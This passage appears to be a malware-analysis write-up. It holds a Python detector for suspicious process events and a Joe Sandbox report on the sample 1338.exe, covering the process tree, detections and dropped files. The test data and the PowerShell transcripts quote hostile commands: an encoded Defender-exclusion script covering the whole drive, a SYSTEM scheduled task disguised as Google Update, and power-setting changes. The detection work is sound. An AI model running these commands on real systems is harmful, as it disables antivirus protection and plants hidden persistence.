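    ("C:\\Windows\\System32\\cmd.exe", 'powershell -EncodedCommand "' + ENC + '"'),
    ("C:\\Windows\\System32\\conhost.exe",
     '"C:\\Windows\\System32\\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & '
     'powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & '
     'powercfg /x -standby-timeout-dc 0'),
    ("C:\\Windows\\System32\\cmd.exe",
     'schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" '
     '/tr \'"C:\\Program Files\\Google\\Chrome\\updater.exe"\''),
    # A console program starting its own conhost.exe is normal and should yield no finding.
    ("C:\\Users\\user\\Desktop\\1338.exe",
     '"C:\\Windows\\System32\\conhost.exe" "C:\\Users\\user\\Desktop\\1338.exe"'),
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalize_script(script):
    """Strip <# ... #> comments and collapse whitespace so the real command is visible."""
    return " ".join(_COMMENT_RE.sub(" ", script).split())


def task_details(cmdline):
    """Extract (task name, action) from a schtasks /create command line."""
    name = re.search(r'/tn\s+"?([^"\s]+)', cmdline, re.IGNORECASE)
    action = re.search(r"/tr\s+(.+)$", cmdline, re.IGNORECASE)
    return (name.group(1) if name else None,
            action.group(1).strip("'^\" ") if action else None)  # drop cmd/quote wrapping


def classify(parent, cmdline):
    """Return the list of findings for one (parent image, child command line) pair."""
    findings = []
    low = cmdline.lower()
    if parent.rsplit("\\", 1)[-1].lower() == "conhost.exe":
        findings.append("conhost.exe spawned a child (console host normally has no children)")
    script = decode_encoded_command(cmdline)
    if script is not None:
        norm = normalize_script(script)
        findings.append("encoded PowerShell: " + norm)
        if "add-mppreference" in norm.lower() and "-exclusionpath" in norm.lower():
            findings.append("Defender path exclusion added")
            if "$env:systemdrive" in norm.lower() or "$env:userprofile" in norm.lower():
                findings.append("exclusion covers the whole system drive or user profile")
    if "powercfg" in low and re.search(r"-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", low):
        findings.append("sleep/hibernate timeout set to 0 (never sleep)")
    if "schtasks" in low and "/create" in low:
        name, action = task_details(cmdline)
        if re.search(r'/ru\s+"?system\b', low):
            findings.append("scheduled task runs as SYSTEM")
        if "/sc onlogon" in low:
            findings.append("scheduled task triggers at every logon")
        if name and name.lower().startswith("googleupdatetaskmachine"):
            findings.append("task name mimics Google Update naming; verify signer of " + str(action))
    return findings


def triage(events):
    """Return {event index: findings} for every event that produced at least one finding."""
    report = {}
    for idx, (parent, cmdline) in enumerate(events):
        findings = classify(parent, cmdline)
        if findings:
            report[idx] = findings
    return report


if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS).items():
        print("event {}: {}".format(idx, SAMPLE_EVENTS[idx][1][:70]))
        for finding in findings:
            print("    -", finding)
```

                    Feed it real process-creation telemetry (Sysmon event 1 or Security 4688 with command-line auditing) as (parent image, command line) pairs; the regex accepts the -e/-ec/-enc abbreviations PowerShell also accepts, and decoding failures return None rather than raising, so one malformed blob does not abort a batch.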
                    MITRE ATT&CK matrix (reconstructed from the flattened grid, one tactic per line; the digits in front of a technique are the report's own signature-count markers, kept verbatim, and unnumbered techniques are the rest of the matrix with no match)
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                    Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task
                    Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
                    Privilege Escalation: 512 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
                    Defense Evasion: 113 Masquerading; 21 Virtualization/Sandbox Evasion; 512 Process Injection; 2 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 File Deletion
                    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                    Discovery: 1 Security Software Discovery; 1 Query Registry; 2 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                    Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                    Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
                    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
                    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
                    Behavior Graph ID: 633539  Sample: 1338.exe  Startdate: 24/05/2022  Architecture: WINDOWS  Score: 100
                    Start-node signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 6 other signatures

                    Process tree (signatures attached to a process in brackets):
                    1338.exe  [Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)]
                      conhost.exe  [drops C:\Program Files\Google\Chrome\updater.exe (PE32+) and C:\...\updater.exe:Zone.Identifier (ASCII); Obfuscated command line found]
                        cmd.exe  [Encrypted powershell cmdline option found; Uses schtasks.exe or at.exe to add and modify task schedules; Uses powercfg.exe to modify the power settings]
                          powershell.exe
                          conhost.exe
                        cmd.exe  [Modifies power options to not sleep / hibernate]
                          5 other processes
                        cmd.exe
                          2 other processes
                        cmd.exe
                          2 other processes
                    updater.exe
                      conhost.exe  [Creates files in the system32 config directory; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes]
                        cmd.exe
                          powershell.exe  [Creates files in the system32 config directory]
                          conhost.exe
                        cmd.exe
                          5 other processes
                        conhost.exe
                          conhost.exe
Source      Detection  Scanner        Label                     Link
1338.exe    68%        Virustotal                               Browse
1338.exe    33%        Metadefender                             Browse
1338.exe    73%        ReversingLabs  Win64.Hacktool.Sysdupate
1338.exe    100%       Avira          HEUR/AGEN.1205338
Source                                        Detection  Scanner        Label                     Link
C:\Program Files\Google\Chrome\updater.exe    100%       Avira          HEUR/AGEN.1205338
C:\Program Files\Google\Chrome\updater.exe    68%        Virustotal                               Browse
C:\Program Files\Google\Chrome\updater.exe    33%        Metadefender                             Browse
C:\Program Files\Google\Chrome\updater.exe    73%        ReversingLabs  Win64.Hacktool.Sysdupate
Source                              Detection  Scanner  Label              Link  Download
37.0.conhost.exe.400000.7.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
37.0.conhost.exe.400000.3.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
37.0.conhost.exe.400000.6.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
23.2.updater.exe.400000.0.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
37.0.conhost.exe.400000.4.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
37.2.conhost.exe.400000.0.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
37.0.conhost.exe.400000.0.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
23.0.updater.exe.400000.0.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
37.0.conhost.exe.400000.2.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
37.0.conhost.exe.400000.1.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
0.0.1338.exe.400000.0.unpack        100%       Avira    HEUR/AGEN.1205338        Download File
0.2.1338.exe.400000.0.unpack        100%       Avira    HEUR/AGEN.1205338        Download File
37.0.conhost.exe.400000.5.unpack    100%       Avira    HEUR/AGEN.1205338        Download File
                    No Antivirus matches
Source                                   Detection  Scanner          Label  Link
http://crl.microsoft.coji                0%         Avira URL Cloud  safe
http://pesterbdd.com/images/Pester.png   0%         URL Reputation   safe
http://crl.microsoft                     0%         URL Reputation   safe
https://go.micro                         0%         URL Reputation   safe
https://contoso.com/                     0%         URL Reputation   safe
https://contoso.com/License              0%         URL Reputation   safe
https://contoso.com/Icon                 0%         URL Reputation   safe
http://www.jsonrpc.org/                  0%         URL Reputation   safe
https://www.vign.                        0%         Avira URL Cloud  safe
http://crl.micros                        0%         URL Reputation   safe
                    No contacted domains info
URLs found in process memory (Name, Source, Malicious, Antivirus Detection, Reputation):
Name: http://crl.microsoft.coji
Source: powershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://crl.microsoft
Source: powershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: https://go.micro
Source: powershell.exe, 00000004.00000002.478242785.00000298536E6000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: https://contoso.com/
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.jsonrpc.org/
Source: conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000001.00000002.516335707.000002779FFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.469069937.0000029851FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.599425355.0000023C45321000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: https://github.com/openwall/john/issues/3454#issuecomment-436899959
Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: https://www.vign.
Source: powershell.exe, 00000004.00000002.479136799.000002986A060000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://crl.micros
Source: powershell.exe, 00000004.00000002.479466307.000002986A4C0000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.gnu.org/licenses/
Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
                                      No contacted IP infos
                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:633539
Start date and time: 2022-05-24 22:18:01 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 17s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:1338.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 44
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.mine.winEXE@52/13@0/0
                                      EGA Information:
                                      • Successful, ratio: 83.3%
                                      HDC Information:
                                      • Successful, ratio: 44.6% (good quality ratio 30.4%)
                                      • Quality average: 45%
                                      • Quality standard deviation: 38.6%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 64
                                      • Number of non-executed functions: 7
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                      • Execution Graph export aborted for target powershell.exe, PID 6280 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
Time      Type             Description
22:19:14  API Interceptor  1x Sleep call for process: 1338.exe modified
22:19:19  API Interceptor  59x Sleep call for process: powershell.exe modified
22:19:44  Task Scheduler   Run new task: GoogleUpdateTaskMachineQC path: "C:\Program Files\Google\Chrome\updater.exe"
22:19:56  API Interceptor  1x Sleep call for process: updater.exe modified
22:20:51  API Interceptor  78x Sleep call for process: conhost.exe modified
                                      No context
                                      No context
                                      No context
                                      No context
Match                                        Associated Sample Name / URL  SHA 256   Detection  Link    Context
C:\Program Files\Google\Chrome\updater.exe   [RDR2]Mode-MENU.exe           Get hash  malicious  Browse
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):1951744
                                        Entropy (8bit):7.999416157743483
                                        Encrypted:true
                                        SSDEEP:49152:bSq99dc5dgyd2j/audFlu5EWEKzCOg/t/XBbntjrXfNpTM:b59STNYjFF8EKLgVRbtjrXH
                                        MD5:AC711E6653707F0B1D245FF40D95385F
                                        SHA1:279B9ABAF000303983D6ECFB91E8B221B00FB198
                                        SHA-256:909409814D725477622728168035C3F2D259B5D8AA1CA77403D8C259BD7ABA63
                                        SHA-512:D394116574E829BC30EEBEBC71ADADB2894D00E7DC31F35EAE0A67675C5FC093BE660382F242A80DFACF5415175B1FFD5817BD408C82F5800E52EA5E4196326E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 68%, Browse
                                        • Antivirus: Metadefender, Detection: 33%, Browse
                                        • Antivirus: ReversingLabs, Detection: 73%
                                        Joe Sandbox View:
                                        • Filename: [RDR2]Mode-MENU.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........................@.....................................\....................................................... ...<.......0...........................................................................\................................text............................... ..`.rdata..l.... ......................@..@.bss.....................................pdata..............................@..@.rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):443
                                        Entropy (8bit):5.329235780090069
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTav:ML9E4Kr8sXE4+Y
                                        MD5:4B5F77D7DC008444A394BA7804852C7F
                                        SHA1:78A05517844669432DE9E5A969BF3D36A34BDCF5
                                        SHA-256:F53487DA3DC7ED3FE66BB543B1596A8E87AF2B75FFDA4CE72B4965635998C535
                                        SHA-512:2017C8491B5AB578C8CF2B424AB82D733E94CA66AB0F63EC16908CCDEE22DD9DF7E9BBEE4FA43FAF60857A3EA1437B52A18BD1EE374F95F397CAF7FA794E73F2
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1292
                                        Entropy (8bit):5.351662875791918
                                        Encrypted:false
                                        SSDEEP:24:3vQPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9eF:oPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                                        MD5:7350077B94CE0B377F5777951DA008BA
                                        SHA1:7B4DBDAD5882D960A13748B5A5E4D9B04E6B0724
                                        SHA-256:FB0F3EDD76324917FAAF82F06D434D956A1686CAD6DB46228EABD7F9FFFF9974
                                        SHA-512:48DE509CCDB58A1433F29F77DDD784921783E6116AA039FFB752AE0BE8544A1740526972E9F9DDCCA6B084119FA7FECEB32DD40A51AB010C0EFE87098807A032
                                        Malicious:false
                                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):6366
                                        Entropy (8bit):5.5669525407628635
                                        Encrypted:false
                                        SSDEEP:96:BZYG/EN2TkgalkUqDo1ZHaZi/EN2TkgalkUqDo1Z86jAjijjZj/EN2TkgalkUqD9:UuTfalkQTfalkGTfalk1
                                        MD5:0C5F24AC3F3773FEEF32AC2A139871D1
                                        SHA1:3C3772E6BCE7381730CF37B74ADB8C72265BC8B0
                                        SHA-256:8EFFDDE982D27DD9B3FDEC8C2F88EF85464B80B107C4887D8EDB976340BD2045
                                        SHA-512:1431FDB15939AF3351E2BECFAE308D20A1D9F055CBD06ECA9E87DD6516C37A1BD31C57081193EDA797B442759C2A6C4EB041904227F9DF070E89D0BB755FE1D4
                                        Malicious:false
                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220524221919..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A..Process ID: 6280..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220524221919..**********************..PS><#mo#> Add-MpPreference <#sun#> -ExclusionPath @($e
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):6330
                                        Entropy (8bit):5.571120625511297
                                        Encrypted:false
                                        SSDEEP:96:BZYNEN2TkgalkZqDo1ZWaZNNEN2TkgalkZqDo1Zt6jAjijjZnNEN2TkgalkZqDoY:STfalkRTfalk+Tfalkw
                                        MD5:6B46A65B7C23145B8AA479C1A4922E0D
                                        SHA1:9B767D0563C67E0F7D970ECC19BC3B4F3A6114A2
                                        SHA-256:79A6D830DE77785BE17BA531028CE085CFE7EDAF4C3ABD98BCE92988C416FFD9
                                        SHA-512:CE19854E88FE6A4BE06674B81107706A9506120004650FEB4E259E227855BC3A942322AEC9120BC15343DFA58D920730BCA1A372594B56D11721F1C6963984E8
                                        Malicious:false
                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220524222003..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A..Process ID: 6476..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220524222003..**********************..PS><#mo#> Add-MpPreference <#sun#> -ExclusionPath @($env:UserProfi
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):539
                                        Entropy (8bit):5.348465763088588
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
                                        MD5:AD3DC4BDB13FFE4ABD214A6EB4E5A519
                                        SHA1:A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
                                        SHA-256:EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
                                        SHA-512:50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):18817
                                        Entropy (8bit):5.001217266823362
                                        Encrypted:false
                                        SSDEEP:384:ufib4GGVoGIpN6KQkj2Akjh4iUxGzCdaOdB/NXp5CvOjJEYoV4fib41:uIGV3IpNBQkj25h4iUxGzCdaOdB/NZwY
                                        MD5:DB93B232EFF0785FDDC28A0D5DAE38D2
                                        SHA1:AF5AFE47557C49F165F66B2B63962D9EB28E3157
                                        SHA-256:92939214003421B64153B215D15F89595673C709110FC6E005FF955F6684C390
                                        SHA-512:5D161CFEE2631553AC2FA8EE407FE4CBA23C9A666BB69049C0FCCBEE99413983C678E4779426532FB4F5E622155C9EFF8DA57CD93AE4453D57301B32C19CBAA9
                                        Malicious:false
                                        Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
